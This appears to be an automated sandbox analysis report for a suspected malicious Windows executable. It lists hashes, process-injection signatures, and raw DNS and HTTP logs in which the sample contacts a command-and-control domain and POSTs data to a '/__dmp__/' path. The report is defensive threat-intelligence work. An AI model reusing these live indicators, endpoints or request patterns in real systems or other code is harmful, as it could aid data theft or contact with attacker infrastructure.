Analysis

  • max time kernel
    93s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24/11/2022, 09:46 UTC

General

  • Target

    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe

  • Size

    1.3MB

  • MD5

    1124d58ea7989a4d9567d8568843aa97

  • SHA1

    a8c62451adc5e56d1019cd864e6edfa8b0e012b0

  • SHA256

    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541

  • SHA512

    1fa28243304e206ee6c5384efcb3a0b7bbe3f10687b92534de3ebe72483177d258652f25ac7eed20ad72c89237e5238ab4657f52131ec40d5f25997ba50e8b48

  • SSDEEP

    24576:zrKqlGCPcJKwybUDwEZZODYmR9G+gnbkk6XRJfe3DqYO/KpLwFfngWX4VmJPak+:zrKo4ZwCOnYjVmJPa1

Score
5/10

Malware Config

Signatures

  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
    "C:\Users\Admin\AppData\Local\Temp\ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4024
    • C:\Users\Admin\AppData\Local\Temp\ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
      2⤵
      • Suspicious use of SetWindowsHookEx
      PID:4232

Network

  • flag-unknown
    DNS
    yhe3i1xa553vtww.0roptbgg23.com
    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
    Remote address:
    8.8.8.8:53
    Request
    yhe3i1xa553vtww.0roptbgg23.com
    IN A
    Response
    yhe3i1xa553vtww.0roptbgg23.com
    IN A
    5.79.71.205
    yhe3i1xa553vtww.0roptbgg23.com
    IN A
    5.79.71.225
    yhe3i1xa553vtww.0roptbgg23.com
    IN A
    85.17.31.82
    yhe3i1xa553vtww.0roptbgg23.com
    IN A
    85.17.31.122
    yhe3i1xa553vtww.0roptbgg23.com
    IN A
    178.162.203.202
    yhe3i1xa553vtww.0roptbgg23.com
    IN A
    178.162.203.211
    yhe3i1xa553vtww.0roptbgg23.com
    IN A
    178.162.203.226
    yhe3i1xa553vtww.0roptbgg23.com
    IN A
    178.162.217.107
  • flag-unknown
    GET
    http://yhe3i1xa553vtww.0roptbgg23.com/7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649
    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
    Remote address:
    5.79.71.205:80
    Request
    GET /7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649 HTTP/1.1
    Accept: */*
    Proxy-authorization: Basic
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
    Host: yhe3i1xa553vtww.0roptbgg23.com
    Connection: Keep-Alive
  • flag-unknown
    GET
    http://yhe3i1xa553vtww.0roptbgg23.com/7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649
    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
    Remote address:
    5.79.71.205:80
    Request
    GET /7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649 HTTP/1.1
    Accept: */*
    Proxy-authorization: Basic
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
    Host: yhe3i1xa553vtww.0roptbgg23.com
    Connection: Keep-Alive
  • flag-unknown
    GET
    http://yhe3i1xa553vtww.0roptbgg23.com/7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649
    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
    Remote address:
    5.79.71.205:80
    Request
    GET /7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649 HTTP/1.1
    Accept: */*
    Proxy-authorization: Basic
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
    Host: yhe3i1xa553vtww.0roptbgg23.com
    Connection: Keep-Alive
  • flag-unknown
    GET
    http://yhe3i1xa553vtww.0roptbgg23.com/7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649
    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
    Remote address:
    5.79.71.205:80
    Request
    GET /7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649 HTTP/1.1
    Accept: */*
    Proxy-authorization: Basic
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
    Host: yhe3i1xa553vtww.0roptbgg23.com
    Connection: Keep-Alive
  • flag-unknown
    POST
    http://yhe3i1xa553vtww.0roptbgg23.com/__dmp__/
    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
    Remote address:
    5.79.71.205:80
    Request
    POST /__dmp__/ HTTP/1.1
    User-Agent: dBrowser 1 CallGetResponse:1
    Host: yhe3i1xa553vtww.0roptbgg23.com
    Content-Length: 1291
    Cache-Control: no-cache
  • flag-unknown
    DNS
    226.101.242.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    226.101.242.52.in-addr.arpa
    IN PTR
    Response
  • flag-unknown
    POST
    http://yhe3i1xa553vtww.0roptbgg23.com/__dmp__/
    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
    Remote address:
    5.79.71.205:80
    Request
    POST /__dmp__/ HTTP/1.1
    User-Agent: session
    Host: yhe3i1xa553vtww.0roptbgg23.com
    Content-Length: 3775
    Cache-Control: no-cache
  • 13.69.239.74:443
    322 B
    7
  • 93.184.220.29:80
    322 B
    7
  • 93.184.220.29:80
    322 B
    7
  • 93.184.220.29:80
    260 B
    5
  • 5.79.71.205:80
    http://yhe3i1xa553vtww.0roptbgg23.com/7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649
    http
    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
    664 B
    225 B
    6
    5

    HTTP Request

    GET http://yhe3i1xa553vtww.0roptbgg23.com/7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649
  • 5.79.71.205:80
    http://yhe3i1xa553vtww.0roptbgg23.com/7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649
    http
    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
    664 B
    225 B
    6
    5

    HTTP Request

    GET http://yhe3i1xa553vtww.0roptbgg23.com/7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649
  • 5.79.71.205:80
    http://yhe3i1xa553vtww.0roptbgg23.com/7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649
    http
    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
    664 B
    225 B
    6
    5

    HTTP Request

    GET http://yhe3i1xa553vtww.0roptbgg23.com/7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649
  • 5.79.71.205:80
    http://yhe3i1xa553vtww.0roptbgg23.com/7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649
    http
    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
    664 B
    225 B
    6
    5

    HTTP Request

    GET http://yhe3i1xa553vtww.0roptbgg23.com/7383c475f7deece545c3a19d07fd954a5bea6d0d9bbf9fa4bb999f467ac55fa97e12a4a879cc946cc56681e4f332603a0d1790153b8107bbaab184a4f0b12b614d6a3f4289660649
  • 5.79.71.205:80
    http://yhe3i1xa553vtww.0roptbgg23.com/__dmp__/
    http
    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
    1.8kB
    265 B
    7
    6

    HTTP Request

    POST http://yhe3i1xa553vtww.0roptbgg23.com/__dmp__/
  • 8.247.211.254:80
    322 B
    7
  • 8.247.211.254:80
    322 B
    7
  • 209.197.3.8:80
    322 B
    7
  • 8.247.211.254:80
    322 B
    7
  • 8.247.211.254:80
    322 B
    7
  • 5.79.71.205:80
    http://yhe3i1xa553vtww.0roptbgg23.com/__dmp__/
    http
    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
    4.3kB
    345 B
    9
    8

    HTTP Request

    POST http://yhe3i1xa553vtww.0roptbgg23.com/__dmp__/
  • 8.8.8.8:53
    yhe3i1xa553vtww.0roptbgg23.com
    dns
    ec6db7679c5f049597f6e45486d634f719616d62cc9d7ad24f759b4922ed3541.exe
    76 B
    204 B
    1
    1

    DNS Request

    yhe3i1xa553vtww.0roptbgg23.com

    DNS Response

    5.79.71.205
    5.79.71.225
    85.17.31.82
    85.17.31.122
    178.162.203.202
    178.162.203.211
    178.162.203.226
    178.162.217.107

  • 8.8.8.8:53
    226.101.242.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    226.101.242.52.in-addr.arpa

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/4232-133-0x0000000000400000-0x00000000004D9000-memory.dmp

    Filesize

    868KB

  • memory/4232-134-0x0000000000400000-0x00000000004D9000-memory.dmp

    Filesize

    868KB

  • memory/4232-135-0x0000000000400000-0x00000000004D9000-memory.dmp

    Filesize

    868KB

  • memory/4232-136-0x0000000000400000-0x00000000004D9000-memory.dmp

    Filesize

    868KB

  • memory/4232-137-0x0000000000400000-0x00000000004D9000-memory.dmp

    Filesize

    868KB

  • memory/4232-138-0x0000000000400000-0x00000000004D9000-memory.dmp

    Filesize

    868KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.